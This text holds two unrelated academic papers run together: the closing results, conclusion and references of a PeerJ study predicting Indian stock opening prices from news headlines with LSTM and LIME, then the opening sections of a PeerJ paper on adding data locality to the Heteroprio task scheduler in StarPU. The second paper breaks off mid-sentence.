http://dx.doi.org/10.7717/peerj-cs.340 Table 4 Results of LIME tool. The sample of the result obtained by the lime tool where each word is as- signed weight or bias. Test Words Weights or biases (approx) Surge −0.15 Baroda +0.1 Higher +0.8 Edges +0.5 Live +0.3 Bank +0.2 Sensex −0.1 Of −0.05 SBI −0.7 Figure 13 Prediction results. Bar graph depicting Predicted Open vs. Actual Open. The red bar shows the Actual Open Prices, and the blue bar shows the predicted opening prices for 7 days. Full-size DOI: 10.7717/peerjcs.340/fig-13 well as the rise of stocks. By Table 4, we can thus interpret our data and thus understand the biases in the dataset. Our model is not just a black box now, and the customers know the insides of the system through just one graph. Thus we achieve the explanations along with the insights from the data. Test results As shown in above Fig. 13, the trained model can now be tested for predictions. The blue bar represents the predicted value, and the red bar represents the actual value obtained from the dataset. This gives us a fair understanding of the output. If we want to test for the real-time news, we can enter news that gets preprocessed and get a measure of the opening price, i.e., how much did the opening price rise or fall from the previous opening price. We present values in Table 4 for getting the exact idea of these values and gauge the accuracy of our predictions. The table below shows the following: date of actual open , previous closing price, predicted opening price by our model, actual opening price, rise / fall in price, error percentage, chi-squared test. Here the: Rise/fall is given by: (Predicted Open -Previous Close) (1.23) Gite et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.340 17/21 https://peerj.com https://doi.org/10.7717/peerjcs.340/fig-13 http://dx.doi.org/10.7717/peerj-cs.340 Table 5 Set of predictions made. The table with the final set of predictions along with comparisons with Actual Opening Prices, calculations for Rise/Fall, Error Percentage, and the chi-squared test. Test case Date Previous close Predicted open Actual open Rise/fall Error(%) Chi-squared test 1 07/07/2020 36487.28 36558.12 36660.35 170.84 0.27 0.28 2 08/07/2020 36674.52 36594.59 36738.38 −79.93 0.39 0.56 3 09/07/2020 36329.01 36512.42 36450.69 183.41 0.16 1.52 4 10/07/2020 36737.69 36678.35 36555.13 −59.34 0.33 0.41 5 13/07/2020 36594.33 36610.27 36,880.66 15.94 0.73 1.98 6 14/07/2020 36693.69 36649.78 36,517.28 −43.91 0.21 0.48 7 15/07/2020 36033.06 36257.20 36,314.76 224.14 0.15 0.01 Error percentage is given by: abs((Actual-predicted)/(Actual ))*100 (1.24) Chi-square is given by:(actual - predicted)2/predicted (1.25) As presented above in Table 5, seven test cases have been stated with the stock market prices along with the rise and fall of those values. The error represents the value difference in percentage (Actual-predicted by our model) and for our test cases, it’s showing in the range 0.15 to 0.73. Thus, we could manage to predict the Indian stock market price using XAI by referring to the impact of financial news articles. Also the chi-square test allows us to assess how much is the observed data varying from actual data. CONCLUSION AND FUTURE SCOPE The financial news articles play a major role in the movement of the stock price. Financial news plays a dominant factor in how a particular company’s stock is perceived by the investors at a given time. Making predictions based on news headlines can help budding investors learn how and when stock prices fall or rise and take a decision based on the same. Our proposed model created an explainable model that gives this explanation as well as maintains and thus makes the output meaningful. This was done with the XAI using the tool LIME. Future research directions could be automated predictions from a news headline from a financial website and a multilingual financial news headline prediction. We can also add emotion-based GIFs to add a fun element and make it more appealing for the learner. The prediction model can be used as a decision-maker for an algorithmic trading model. ADDITIONAL INFORMATION AND DECLARATIONS Funding The authors received no funding for this work. Competing Interests The authors declare there are no competing interests. Gite et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.340 18/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.340 Author Contributions • Shilpa Gite and Ketan Kotecha analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • Hrituja Khatavkar conceived and designed the experiments, performed the experiments, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • Shilpi Srivastava conceived and designed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • Priyam Maheshwari performed the experiments, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. • Neerav Pandey performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. Data Availability The following information was supplied regarding data availability: Raw data, including financial news headlines obtained from Pulse and data from Yahoo Finance, is available in the Supplementary Files. Code is available at GitHub: https://github.com/Hrituja/Stock-Market-Prediction. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.340#supplemental-information. REFERENCES Bird S, Klein E, Loper E. 2016. Natural language processing with python. Available at https://b-ok.cc/book/755716/be52d7?dsource=recommend (accessed on 16 July 2020). Cho K, Merrienboer BV, Gulcehre C, Bahdanau D, Bougares F, Schwenk H, Bengio Y. 2014. Learning phrase representations using rnn encoder-decoder for statistical machine translation. In: Proceedings of the 2014 conference on empirical methods in natural language processing (EMNLP). DOI 10.3115/v1/d14-1179. Doran D, Schulz S, Besold TR. 2017. What does explainable ai really mean? A new conceptualization of perspectives. ArXiv preprint. arXiv:abs/1710.00794. Egeli B, Ozturan M, Badur B. 2003. Stock market prediction using artificial neural networks. In: Proceedings of the 3rd International Conference on Business, Hawaii, 18– 21 June 2003. 1–8. Ghosh A, Bose B, Maji G, Debnath NN, Sen S. 2019. Stock price prediction using LSTM on Indian Share Market. EasyChair 63:101–110 DOI 10.29007/qgcz. Greff K, Srivastava RK, Koutnik J, Steunebrink BR, Schmidhuber J. 2015. LSTM: a search space odyssey. ArXiv preprint. arXiv:1503.04069. Gite et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.340 19/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.340#supplemental-information https://github.com/Hrituja/Stock-Market-Prediction http://dx.doi.org/10.7717/peerj-cs.340#supplemental-information http://dx.doi.org/10.7717/peerj-cs.340#supplemental-information https://b-ok.cc/book/755716/be52d7?dsource=recommend http://dx.doi.org/10.3115/v1/d14-1179 http://arXiv.org/abs/abs/1710.00794 http://dx.doi.org/10.29007/qgcz http://arXiv.org/abs/1503.04069 http://dx.doi.org/10.7717/peerj-cs.340 Hiransha M, Gopalakrishnan EA, VijayKrishna M, Soman KP. 2018. NSE stock market prediction using deep-learning models. Procedia Computer Science 132:1351–1362 DOI 10.1016/j.procs.2018.05.050. Hochreiter S, Schmidhuber J. 1997. Long Short-Term Memory. Neural Computation 9(8):1735–1780 DOI 10.1162/neco.1997.9.8.1735. Kalyani J, Bharathi HN, Rao J. 2016. Stock Trend Prediction Using News Sentiment Analysis’’. International Journal of Computer Science & Information Technology (IJCSIT) 8(3):67–76. Khaleghi B. 2019. The how of explainable AI: post-modelling explainability. Towards Media Science. Available at https://towardsdatascience.com/the-how-of-explainable- ai-post-modelling-explainability-8b4cbc7adf5f (accessed on 16 July 2020). Kim H, Won C. 2018. Forecasting the volatility of stock price index: a hybrid model inte- grating LSTM with multiple GARCH-type models. Expert Systems with Applications 103:23–37 DOI 10.1016/j.eswa.2018.03.002. Messalas A, Christos M, Yannis K. 2019. Model-agnostic interpretability with shapley values. DOI 10.1109/IISA.2019.8900669. Moghar A, Hamiche M. 2020. Stock market prediction using LSTM recurrent neural net- work. Procedia Computer Science 170:1168–1173 DOI 10.1016/j.procs.2020.03.049. Nayak A, Pai MM, Pai RM. 2016. Prediction models for Indian Stock market. Procedia Computer Science 89:441–449. Olah C. 2020. Understanding LSTM Networks. [Blog Post]. Available at https://colah. github.io/posts/2015-08-Understanding-LSTMs/ (accessed on 16 July 2020). Patel J, Shah S, Thakkar P, Kotecha K. 2015. Predicting stock and stock price index movement using trend deterministic data preparation and machine learning tech- niques. Expert Systems with Applications 42:259–268 DOI 10.1016/j.eswa.2014.07.040. Patel J, Shah S, Thakkar P, Kotecha K. 2014. Predicting stock market index using fusion of machine learning techniques. Expert Systems with Applications 42:2162–2172 DOI 10.1016/j.eswa.2014.10.031. Pathmind, Inc. 2020. A beginner’s guide to LSTMs and recurrent neural networks. Available at https://pathmind.com/wiki/lstm. Pulse by Zerodha. 2020. Pulse by Zerodha—The latest financial and market news from all major Indian news sources aggregated in one place. Available at https://pulse. zerodha.com/ (accessed on 16 July 2020). Ribeiro M, Singh S, Guestrin C. 2016. ’’Why should i trust you?’’: explaining the predictions of any classifier. 97:7–101 DOI 10.18653/v1/N16-3020. Saffar M. 2019. How explainable artificial intelligence (XAI) can help us trust AI. Medium. Available at https://medium.com/altaml/how-explainable-artificial- intelligence-xai-can-help-us-trust-ai-8f01b574102d (accessed on 16 July 2020). Selvin S, Vinayakumar R, Gopalakrishnan EA, Menon VK, Soman KP. 2017. Stock price prediction using LSTM, RNN and CNN-sliding window model. In: 2017 International conference on advances in computing, communications and informatics (ICACCI). DOI 10.1109/icacci.2017.8126078. Gite et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.340 20/21 https://peerj.com http://dx.doi.org/10.1016/j.procs.2018.05.050 http://dx.doi.org/10.1162/neco.1997.9.8.1735 https://towardsdatascience.com/the-how-of-explainable-ai-post-modelling-explainability-8b4cbc7adf5f https://towardsdatascience.com/the-how-of-explainable-ai-post-modelling-explainability-8b4cbc7adf5f http://dx.doi.org/10.1016/j.eswa.2018.03.002 http://dx.doi.org/10.1109/IISA.2019.8900669 http://dx.doi.org/10.1016/j.procs.2020.03.049 https://colah.github.io/posts/2015-08-Understanding-LSTMs/ https://colah.github.io/posts/2015-08-Understanding-LSTMs/ http://dx.doi.org/10.1016/j.eswa.2014.07.040 http://dx.doi.org/10.1016/j.eswa.2014.10.031 https://pathmind.com/wiki/lstm https://pulse.zerodha.com/ https://pulse.zerodha.com/ http://dx.doi.org/10.18653/v1/N16-3020 https://medium.com/altaml/how-explainable-artificial-intelligence-xai-can-help-us-trust-ai-8f01b574102d https://medium.com/altaml/how-explainable-artificial-intelligence-xai-can-help-us-trust-ai-8f01b574102d http://dx.doi.org/10.1109/icacci.2017.8126078 http://dx.doi.org/10.7717/peerj-cs.340 Sherstinsky A. 2020. Fundamentals of recurrent neural network (RNN) and long short- term memory (LSTM) network. Physica D: Nonlinear Phenomena 404:132306 DOI 10.1016/j.physd.2019.132306. Shrikumar A, Greenside P, Shcherbina A, Kundaje A. 2016. Not just a black box: learning important features through propagating activation differences.. Tan KK, Le NQK, Yeh HY, Chua MCH. 2019. Ensemble of deep recurrent neural networks for identifying enhancers via dinucleotide physicochemical properties. Cell 8(7):767 DOI 10.3390/cells8070767. Ţiţan AG. 2015. The efficient market hypothesis: review of specialized litera- ture and empirical research. Procedia Economics and Finance 32:442–449 DOI 10.1016/s2212-5671(15)01416-1. Vargas MR, Lima BS, Evsuko A. 2017. Deep learning for stock market prediction from financial news articles. In: 2017 IEEE International Conference on Computational Intelligence and Virtual Environments for Measurement Systems and Applications (CIVEMSA). Piscataway: IEEE, 60–65. Wexler J, Pushkarna M, Bolukbasi T, Wattenberg M, Viega F, Wilson J. 2019. The What-If Tool: interactive probing of machine learning models. IEEE Transactions on Visualization and Computer Graphics 26:56–65 DOI 10.1109/TVCG.2019.2934619. Yahoo Finance. 2020. Yahoo Finance–stock market live, quotes, business & finance news. Available at https://in.finance.yahoo.com/ (accessed on 16 July 2020). Yoo PD, Kim MH, Jan T. 2005. Machine learning techniques and use of event infor- mation for stock market prediction: a survey and evaluation. In: International Conference on Computational Intelligence for Modeling, Control and Automation (CIMCA 2005). Piscataway: IEEE, 835–841. Zhang X, Chen F, Huang R. 2018. A combination of RNN and CNN for attention-based relation classification. Procedia Computer Science 131:911–917 DOI 10.1016/j.procs.2018.04.221. Zhang X, Fuehres H, Gloor PA. 2011. Predicting Stock Market Indicators Through Twitter ’’I hope it is not as bad as I fear. Procedia - Social and Behavioral Sciences 26:55–62 DOI 10.1016/j.sbspro.2011.10.562. Gite et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.340 21/21 https://peerj.com http://dx.doi.org/10.1016/j.physd.2019.132306 http://dx.doi.org/10.3390/cells8070767 http://dx.doi.org/10.1016/s2212-5671(15)01416-1 http://dx.doi.org/10.1109/TVCG.2019.2934619 https://in.finance.yahoo.com/ http://dx.doi.org/10.1016/j.procs.2018.04.221 http://dx.doi.org/10.1016/j.sbspro.2011.10.562 http://dx.doi.org/10.7717/peerj-cs.340 work_3snzfdkn7bb6hpxhca6z5amcfa ---- Impact study of data locality on task-based applications through the Heteroprio scheduler HAL Id: hal-02120736 https://hal.inria.fr/hal-02120736 Submitted on 6 May 2019 HAL is a multi-disciplinary open access archive for the deposit and dissemination of sci- entific research documents, whether they are pub- lished or not. The documents may come from teaching and research institutions in France or abroad, or from public or private research centers. L’archive ouverte pluridisciplinaire HAL, est destinée au dépôt et à la diffusion de documents scientifiques de niveau recherche, publiés ou non, émanant des établissements d’enseignement et de recherche français ou étrangers, des laboratoires publics ou privés. Impact study of data locality on task-based applications through the Heteroprio scheduler Bérenger Bramas To cite this version: Bérenger Bramas. Impact study of data locality on task-based applications through the Heteroprio scheduler. PeerJ Computer Science, PeerJ, 2019, 5, pp.e190. �10.7717/peerj-cs.190�. �hal-02120736� https://hal.inria.fr/hal-02120736 https://hal.archives-ouvertes.fr Impact study of data locality on task-based applications through the Heteroprio scheduler Bérenger Bramas CAMUS Team, Inria Nancy—Grand Est, Illkirch-Graffenstaden, France ABSTRACT The task-based approach has emerged as a viable way to effectively use modern heterogeneous computing nodes. It allows the development of parallel applications with an abstraction of the hardware by delegating task distribution and load balancing to a dynamic scheduler. In this organization, the scheduler is the most critical component that solves the DAG scheduling problem in order to select the right processing unit for the computation of each task. In this work, we extend our Heteroprio scheduler that was originally created to execute the fast multipole method on multi-GPUs nodes. We improve Heteroprio by taking into account data locality during task distribution. The main principle is to use different task-lists for the different memory nodes and to investigate how locality affinity between the tasks and the different memory nodes can be evaluated without looking at the tasks’ dependencies. We evaluate the benefit of our method on two linear algebra applications and a stencil code. We show that simple heuristics can provide significant performance improvement and cut by more than half the total memory transfer of an execution. Subjects Distributed and Parallel Computing Keywords Scheduling, Task-based, Starpu, HPC, Data locality INTRODUCTION High-performance computing (HPC) is crucial to make advances and discoveries in numerous domains. However, while supercomputers are becoming more powerful, their complexity and heterogeneity also increase; in 2018, a quarter of the most powerful supercomputers in the world are equipped with accelerators (see https://www.top500.org/), and the majority of them (including the top two on the list) uses GPUs in addition to traditional multi-core CPUs. The efficient use of these machines and their programmability are ongoing research topics. The objectives are to allow the development of efficient computational kernels for the different processing units and to create the mechanisms to balance the workload and copy/distribute the data between the CPUs and the devices. Furthermore, this complexity forces some of the scientific computing developers to alternate computation on CPUs or GPUs, but never use both at the same time. This naive parallelization scheme usually provides a speedup compared to a CPU-only execution, but it ends in wastage of computational resources and utilization of extra barrier synchronizations. Meanwhile, the HPC community has proposed several strategies to parallelize applications on heterogeneous computing nodes with the aim of using all available resources. Among the existing methods, the task-based approach has gained popularity: mainly because it How to cite this article Bramas B. 2019. Impact study of data locality on task-based applications through the Heteroprio scheduler. PeerJ Comput. Sci. 5:e190 DOI 10.7717/peerj-cs.190 Submitted 3 January 2019 Accepted 3 April 2019 Published 6 May 2019 Corresponding author Bérenger Bramas, berenger.bramas@inria.fr Academic editor John Owens Additional Information and Declarations can be found on page 22 DOI 10.7717/peerj-cs.190 Copyright 2019 Bramas Distributed under Creative Commons CC-BY 4.0 https://www.top500.org/ http://dx.doi.org/10.7717/peerj-cs.190 mailto:berenger.�bramas@�inria.�fr https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.190 http://www.creativecommons.org/licenses/by/4.0/ http://www.creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ makes it possible to create parallel codes with an abstraction of the hardware by delegating the task distribution and load balancing to dynamic schedulers. In this method, the workload is split into inter-dependent computational elements and is managed by a runtime system (RS). There are several RS reported in the literature (Danalis et al., 2014; Kale & Krishnan, 1993; Perez, Badia & Labarta, 2008; Gautier et al., 2013; Bauer et al., 2012; Tillenius, 2015), and each of them has its own specificity and interface. We refer to a comparative study (Thoman et al., 2018) for a detailed description where the different aspects and features of RS are categorized. Task-based method is a viable solution to use modern heterogeneous computing nodes and mix computation between CPU and devices. Furthermore, the potential of this approach has already been proven on numerous computational methods. In the task-based method, the scheduler is in charge of the most important decisions, as it has to decide the order of computation of the ready tasks (the tasks that have their dependencies satisfied) as well as where those tasks should be computed. In the present study, we implemented our scheduler inside a RSs called StarPU (Augonnet et al., 2011), which supports heterogeneous architectures and allows customizing the scheduler in an elegant manner. In our previous work, we created the Heteroprio scheduler to execute the fast multipole method (FMM) using StarPU on computing nodes equipped with multiple GPUs (Agullo et al., 2016b). Heteroprio was first implemented inside ScalFMM (Bramas, 2016), and it was later included in StarPU. It is publicly available and usable by any StarPU-based code. In fact, Heteroprio was later used in linear algebra applications where it demonstrated its robustness and potential, see QrMUMPS (Agullo et al., 2015) and SpLDLT (Lopez & Duff, 2018). Moreover, it was also the subject of theoretical studies (Beaumont et al., 2016; Beaumont, Eyraud-Dubois & Kumar, 2017, 2018; Agullo et al., 2016a), which revealed its advantages and gave a positive theoretical insight on the performance. However, the original Heteroprio scheduler does not take into account data locality. The distribution of the tasks—the choice of the processing unit that will compute a given task—is done without considering the distribution of the data. Therefore, depending on the applications and the test cases, Heteroprio can not only lead to huge data movement between CPUs and GPUs but also between GPUs, which dramatically penalizes the execution. The current work proposed different mechanisms to consider data locality in order to reduce the data transfers and the makespan. The contributions of this paper are as follows: � We summarize the main ideas of the Heteroprio scheduler and explain how it can be implemented in a simple and efficient manner; � We propose new mechanisms to include data locality in the Heteroprio scheduler’s decision model; � We define different formulas to express the locality affinity for a given task relative to the different memory nodes. Those formulas are based on general information regarding the hardware or the data accesses; � We evaluate our approach on two linear algebra applications, QrMumps and SpLDLT, and a stencil application, and analyze the effect of the different parameters. Bramas (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.190 2/24 http://dx.doi.org/10.7717/peerj-cs.190 https://peerj.com/computer-science/ The rest of the paper is organized as follows. In the section “Background,” we introduce the task-based parallelization and the original Heteroprio scheduler. Then, in the section “Introducing Laheteroprio,” we detail our new methods to use data locality and the different mechanisms of our locality-aware Heteroprio (LAHeteroprio) scheduler. Finally, we evaluate our approach in the section “Performance Study” by plugging in the LAHeteroprio inside StarPU to execute two different linear algebra applications using up to four GPUs. BACKGROUND Task-based parallelization The task-based approach divides an application into interdependent sections, called tasks, and provides the dependencies between them. These dependencies allow valid parallel executions, that is, with a correct execution order of the tasks and without race conditions. This description can be viewed as a graph where the nodes represent the tasks and the edges represent the dependencies. If the edges represent a relation of precedence between the tasks, the resulting graph is a direct acyclic graph of tasks. However, this is not the case when an inter-tasks dependency relation is used, such as a mechanism to express that an operation is commutative (Agullo et al., 2017). In the paper, we consider graphs of the form G = (V, E) with a set of nodes V and a set of edges E. Considering t1,t2 ∈ V, there exists a relation (t1,t2) ∈ E—also written t1 ! t2—if the task t2 can be executed only after the task t1 is over. A task t is a computational element that is executable on one or (potentially) several different types of hardware. When t is created, it incorporates different interchangeable kernels where each of them targets a different architecture. For example, consider a matrix-matrix multiplication task in linear algebra: it could be either a call to cuBLAS and executed on a GPU, or a call to Intel MKL and executed on a CPU, but both kernels return a result that is considered equivalent. Task t accesses data either in read, read-write or write and in the rest of the paper we consider equivalent the read-write and the write accesses. We denote t.data to be the set of data elements that t will access during its execution. From this information, that is, G = (V, E) and the portability of the tasks, the scheduler must decide the order of computation and where to execute the tasks. Task scheduling and related work Scheduling can be done statically or dynamically, and in both cases, finding an optimal distribution of the tasks is usually NP complete since the solution must find the best computing order and the best processing unit for each task (Peter Brucker, 2009). The static approaches have a view on the complete set of tasks before the beginning of the execution (Baptiste, Pape & Nuijten, 2001), and thus can use expensive mechanisms to analyze the relationship between the tasks. Advanced strategies are also used, such as duplicating tasks to replace communications with computation (He et al., 2019). It is worth mentioning that these strategies can have significant overhead compared to their benefit and the execution time of the tasks, which make them unusable in real applications. Bramas (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.190 3/24 http://dx.doi.org/10.7717/peerj-cs.190 https://peerj.com/computer-science/ Static scheduling requires performance models, so it can predict the duration of the tasks on the different architectures and the duration of the communications. Even, if it is possible to build such systems, they require costly calibration/evaluation stages and their resulting prediction models are not always accurate, especially in the case of irregular applications. Moreover, these approaches cannot adapt their executions to the unpredictable noise generated by the OS or the hardware. This is why most task-based applications use RSs that are powered with dynamic scheduling strategies (Akbudak et al., 2018; Sukkari et al., 2018; Moustafa et al., 2018; Carpaye, Roman & Brenner, 2018; Agullo et al., 2016b). In this case, the scheduler focuses only on the ready tasks and decides during the execution on how to distribute them. It has been demonstrated that these strategies are able to deliver high performance with reduced overhead. The scheduler becomes a critical layer of the RS, at the boundary between the dependencies manager and the workers, see Fig. 1. We follow the StarPU’s terminology and consider that a scheduler has an entry point where the ready tasks are pushed, and it provides a request method where workers pop the tasks to execute. In StarPU, both pop/push methods are directly called by the workers that either release the dependencies or ask for a task. Consequently, assigning a task to a given worker means to return this task when the worker calls the pop method. As an intuitive example, consider a priority-based scheduler designed to manage priorities with one task-list per priority. The push method can simply store a newly ready task t in the right list list[t.priority].push_back(t). Meanwhile, the pop method can iterate over the lists and when it finds one non-empty list, it pops a task from it. Furthermore, in the case of heterogeneous computing, a pop must return a task compatible with the worker that performs the request. Managing data locality was already a challenge before the use of heterogeneous computing because of NUMA hardware and a simple scheduling strategy has been proposed to improve data locality on the NUMA nodes (Al-Omairy et al., 2015). Past work has introduced distance-aware work-stealing scheduling heuristics within the OmpSs runtime, targeting dense linear algebra applications on homogeneous x86 hardware. While Figure 1 Schematic view of task-based runtime system organization. A program can be described using the sequential task flow (STF) model and converted into tasks/dependencies by the RS. When dependencies are released, the newly ready tasks are pushed into the scheduler. When a worker is idle, it calls the pop function of the scheduler to request a task to execute. Full-size DOI: 10.7717/peerj-cs.190/fig-1 Bramas (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.190 4/24 http://dx.doi.org/10.7717/peerj-cs.190/fig-1 http://dx.doi.org/10.7717/peerj-cs.190 https://peerj.com/computer-science/ the method provides a significant speedup, it does not take into account the different data accesses (read or write) or look at the cache levels to find data replication. The importance of data locality to move forward with exascale computing has been emphasized (Unat et al., 2017) with a focus on task-based RSs. The authors shown that data movement is now the primary source of energy consumption in HPC. In era of heterogeneous computing, the community has provided various strategies to schedule graphs of tasks on this kind of architecture, and one of the most famous is the heterogeneous earliest finish time (HEFT) scheduler (Topcuoglu, Hariri & Wu, 2002). In HEFT, tasks are prioritized based on a heuristic that takes into account a prediction of the duration of the tasks and the data transfers between tasks. Different models exist, but on a heterogeneous computing node, the duration of a task can be the average duration of the task on the different types of processing unit. More advanced ranking models had been defined (Shetti, Fahmy & Bretschneider, 2013). However, this scheduler has two limitations that we would like to alleviate. First, it uses a prediction system, which may need an important tuning stage and may be inaccurate, as we previously argued. Second, even if ranking a set of tasks can be amortized and beneficial, re-ranking the tasks to consider new information concerning the ongoing execution can add a dramatic overhead. This is why we have proposed an alternative scheduler. Heteroprio Multi-priorities Within Heteroprio, we assign one priority per processing unit type to each task, such that a task has several priorities. Each worker pops the task that has the highest priority for the hardware type it uses, which are CPU or GPU in the present study. With this mechanism, each type of processing unit has its own priority space. This allows to continue using priorities to manage the critical path, and also to promote the consumption of tasks by the more appropriate workers: workers do first what they are good at. The tasks are stored inside buckets, where each bucket corresponds to a priority set. Then each worker uses an indirect access array to know the order in which it should access the buckets. Moreover, all the tasks inside a bucket must be compatible with all the processing units that may access it (at least). This allows an efficient implementation. As a result, we have a constant complexity for the push and complexity of O(B) for the pop, where B is the number of buckets. The number of buckets B corresponds to the number of priority groups, which is equal to the number of different operation types in most cases. A schematic view of the scheduler is provided in Fig. 2. For illustration, let us consider an application with four different types of task TA, TB, TC and TC′ (here TC and TC′ can be the same operation but with data of small or large granularity, respectively). Tasks of types TA, TC and TC′ provide a kernel for CPU and GPU and thus are executable on both, but tasks of type TB are only compatible with CPUs. Consequently, we know that GPU workers do not access the bucket where TB tasks are stored. Then, we consider that the priorities on CPU are PCPU(TA) = 0, PCPU(TB) = 1, PCPU(TC) = 2 and PCPU(TC′) = 3; on GPU the priorities are PGPU(TA) = 1, PGPU(TC) = 0 and PGPU(TC′) = 0. We highlight that TC and TC′ have the same priority for GPU workers. Bramas (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.190 5/24 http://dx.doi.org/10.7717/peerj-cs.190 https://peerj.com/computer-science/ From this configuration, we end with four buckets: B0 = {TA}, B1 = {TB}, B2 = {TC} and B3 = {TC′}. Finally, the indirect access arrays are ACPU = {0,1,2,3} and AGPU = {3,2,0} with AGPU = {2,3,0} being valid as well. Speedup factors The speedup factors are used to manage the critical moments when a low number of ready tasks are available. The idea is to forbid some workers to get a task from a set of buckets when their corresponding hardware type is not the fastest to compute the buckets’ tasks. To do so, the type of processing unit that is the fastest in average to execute the bucket’s tasks, is provided for each bucket. Additionally, we input a number that indicates by how much this processing unit type is faster compared to the other types of processing units. These numbers are used to define a limit under which the slow workers cannot pick a task. As an illustration, let us consider two types of processing units: CPU and GPU. Let Si be the speedup factor for bucket i and let GPU be the fastest type to compute the task stored in i. A CPU worker can take a task from bucket i if there are more than NGPU � Si available tasks in it, where NGPU is the number of GPU workers. For example, if there are three GPU workers and that a GPU is two times faster in average than a CPU to perform a given operation, then a CPU worker takes a task only if there are six or more tasks available. Otherwise, it considers the bucket empty and continues to the next ones to find a task to compute. This means that for the example given in the section “Multi-Priorities,” we have two arrays of four items for the different operations, one to tell which processing units is the fastest, and a second one to provide the speedup. The description of the example tells us that the GPU cannot compute TA, so CPU are the fastest by default, and that TC and TC′ are the same operation but with different granularities, such that the speedup for the GPU will be higher for TC′ than TC. As a results, the arrays could be Best = {CPU, GPU, GPU, GPU} and Speedup = {1, 1.1, 1.4, 3}. This system is used for each bucket individually and not globally. Therefore, if the number of buckets is large, this can lead to overflowing some workers and artificially keeping others idle. However, we found that in practice it provides beneficial results especially at the end of simulations. Figure 2 Heteroprio schematic view. Tasks are pushed inside the buckets. Each worker iterates on the buckets based on the priorities for the hardware it uses. Full-size DOI: 10.7717/peerj-cs.190/fig-2 Bramas (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.190 6/24 http://dx.doi.org/10.7717/peerj-cs.190/fig-2 http://dx.doi.org/10.7717/peerj-cs.190 https://peerj.com/computer-science/ INTRODUCING LAHETEROPRIO 2D Task-list grid by splitting the buckets per memory nodes Our first step in managing data locality is to subdivide each bucket into M different task- lists and set up one list for each of the M memory nodes. For example, if the machine is composed of two GPUs and one CPU, we have three task-lists per bucket by considering NUMA memory nodes as a single one, without loss of generality. We obtain a 2D grid of task-lists G where the different buckets are in the first dimension and the memory nodes are in the second dimension, as illustrated in Fig. 3. We store in the list G(b,m) all the tasks of the bucket index b that we consider local to the memory node m. In this context, local means that an execution on a processing unit connected to m should have the lowest memory transfer cost. The list G(b,m) can also contain tasks that processing units connected to m cannot compute. This can happen when m is a GPU and the tasks of bucket index b do not provide a GPU function. Nevertheless, when workers steal tasks from G(b,m), we know that they have the highest affinity for the memory node m even if it is impossible to compute these tasks on a attached processing unit. From this description, we must provide a mechanism to find out the best memory node for every newly ready task, to push the tasks in the right list, and also decide how the workers should iterate on G and select a task. Extending the example from the sections “Multi-Priorities” and “Speedup Factors,” the number of tasks list in each bucket is hardware specific because it corresponds to the number of memory nodes. Task insertion in the grid with locality evaluation (push) In the original Heteroprio, there is no choice where a given task has to be stored, as it must be in the list of its corresponding bucket, that is, in scheduler.list[task.bucket].push_back (task). On the other hand, in LAHeteroprio we have to decide in which list of the selected bucket we should put the task; we have to find the best m in scheduler.list[task. bucket][m].push_back(task). Therefore, we propose different formulas to estimate the locality of a task regarding the memory nodes and the distribution of the data it uses. 4 b u ck e ts Figure 3 LAHeteroprio schematic view of a grid composed of four buckets and three memory nodes. The decision that the scheduler has to do is to put the tasks in the more appropriate lists and to decide how the workers iterate on the grid. Full-size DOI: 10.7717/peerj-cs.190/fig-3 Bramas (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.190 7/24 http://dx.doi.org/10.7717/peerj-cs.190/fig-3 http://dx.doi.org/10.7717/peerj-cs.190 https://peerj.com/computer-science/ The specificity of this approach is to determine the most suitable memory node without looking at the algorithm itself. We only look at each task individually without following the links it has with some other tasks and without making a prediction of how the pieces of data are going to move. Last recently used In this strategy, we consider that the memory node related to the worker that pushes the task has the best locality; a newly ready task t released by worker w is pushed into G(t.bucket_id, w.memory_node). Indeed, t and the last task executed by w have at least one data dependency in common, and this data is already on the memory node if it has not been evicted. The main advantage of this technique is its simplicity and low overhead. However, it is obviously far from accurate. For example, it does not evaluate the amount of data that is already available on the memory node compared to the total amount of data that t will use. Moving cost estimation seems natural to consider that the best memory node is the one that will allow moving the data in the shortest time. StarPU provides the function starpu_task_expected _data_transfer_time_for that predicts this transfer duration by looking where the pieces of data are and the possible transfer paths between the memory nodes. From this prediction, we obtain a moving cost and we refer to it as MC_StarPU. Data locality affinity formulas StarPU’s prediction has two potential drawbacks: The first is that it treats all data dependencies similarly without making a distinction if the dependencies are read or write, and the second is that the memory transfer predictions are difficult to achieve since they are based on models that can be inaccurate and influenced by the on-going execution. Therefore, we propose different formulas to estimate the locality of a task and we obtain either a locality score for each memory node (the higher the better), or a moving cost (the lower the better). This information is used to decide where to put the newly ready tasks in the grid. In our next formulas, we use the following notations Dt;m ¼ t:data \ m:data; (1) Dt;:m ¼ t:data \ :m:data; (2) DREADt;m ¼ t:data \ m:data \ READ; (3) DWRITEt;m ¼ t:data \ m:data \ WRITE; (4) READ \ WRITE ¼ [: (5) Here, Dt,m is the set of data used by task t and that exist on memory node m, whereas Dt,¬m represents the set of data used by t that is not on m. D READ t,m and D WRITE t,m are the sets of data used by t that exist on m and that are accessed in read mode and write mode, respectively. Bramas (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.190 8/24 http://dx.doi.org/10.7717/peerj-cs.190 https://peerj.com/computer-science/ We define the sum of all the pieces of data hosted 